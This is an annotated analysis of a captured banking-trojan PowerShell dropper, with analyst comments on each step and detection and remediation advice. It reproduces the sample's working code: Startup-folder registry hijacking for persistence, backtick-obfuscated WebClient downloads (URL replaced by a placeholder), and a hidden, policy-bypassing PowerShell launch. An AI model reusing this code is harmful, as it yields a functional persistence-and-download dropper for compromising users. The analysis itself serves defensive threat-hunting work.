Links:
- hxxps://ia801400.us.archive.org/0/items/bat02/bat02.txt
Identifiers: Bank Trojan, File Downloader, Hashing
Discord Info: Server ID: 821807081475932183, Channel ID: 829546268577366056
Structure:
# Analyst annotation: persistence setup. The sample lines are kept exactly as captured.
# Creates C:\Users\Public\Run, a directory under the shared Public profile.
[system.io.directory]::CreateDirectory("C:\Users\Public\Run")
start-sleep -s 5
# Rewrites the current user's "Startup" value under both "User Shell Folders" and
# "Shell Folders" so that the Startup folder resolves to C:\Users\Public\Run.
# Both keys are under HKCU, so the change needs no elevation. Windows launches the
# contents of the Startup folder at logon, so any file later written to this
# directory runs at the next sign-in (MITRE ATT&CK T1547.001).
# Detection: alert on registry value sets to ...\Explorer\User Shell Folders\Startup
# and ...\Explorer\Shell Folders\Startup whose data is not the default per-user
# Startup path (for example via Sysmon Event ID 13).
# Remediation: restore both values to their defaults and review C:\Users\Public\Run.
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\Users\Public\Run";
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\Users\Public\Run";
# Fixed delay; the sample does not show why (presumably pacing between stages - unconfirmed).
start-sleep -s 5
# Analyst annotation: HBankers is the download-and-execute stage. It fetches two
# files with Net.WebClient and starts the second one in a new PowerShell process.
# The sample lines are kept exactly as captured.
Function HBankers
{
start-sleep -s 5
# The type and method names carry a backtick before every character. As interpreted
# by Windows PowerShell, a backtick before these characters is a no-op escape, so the
# strings evaluate to Net.WebClient and DownloadFile while not matching a plain-text
# search for either name. Detection content should strip backticks (and ignore case)
# before matching, e.g. on script block logging output (Event ID 4104).
# DownloadFile returns no value, so the empty `if` body is never entered; the wrapper
# exists only to make the call.
# 'MALWARE_URL' appears to be a placeholder substituted for the real address in this
# write-up.
# Destination: Run.bat inside C:\Users\Public\Run, the directory this script registers
# as the user's Startup folder, so the batch file is launched at logon.
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('MALWARE_URL','C:\Users\Public\Run\Run.bat')){
}
start-sleep -s 5
# Second download. The file name begins with a space (" Microsoft.ps1") and sits
# directly under C:\Users\Public; keep the leading space when hunting for this file.
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('MALWARE_URL', 'C:\Users\Public\ Microsoft.ps1')){
}
start-sleep -s 7
# Runs the downloaded script in a child powershell process using abbreviated
# parameters: -windo 1 is -WindowStyle with value 1 (Hidden), -exec bypass is
# -ExecutionPolicy Bypass, and -noexit keeps the process alive after the script ends.
# Detection: process-creation logging (Event ID 4688 or Sysmon Event ID 1) for
# powershell command lines combining a hidden window, an execution-policy bypass and
# a -file path under C:\Users\Public. Match on parameter prefixes, not full names.
powershell -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"
}
# Analyst annotation: entry point. The function is invoked indirectly by passing its
# name to Invoke-Expression (alias IEX) instead of calling HBankers directly, so the
# call surfaces as an IEX invocation in script block logs.
IEX HBankers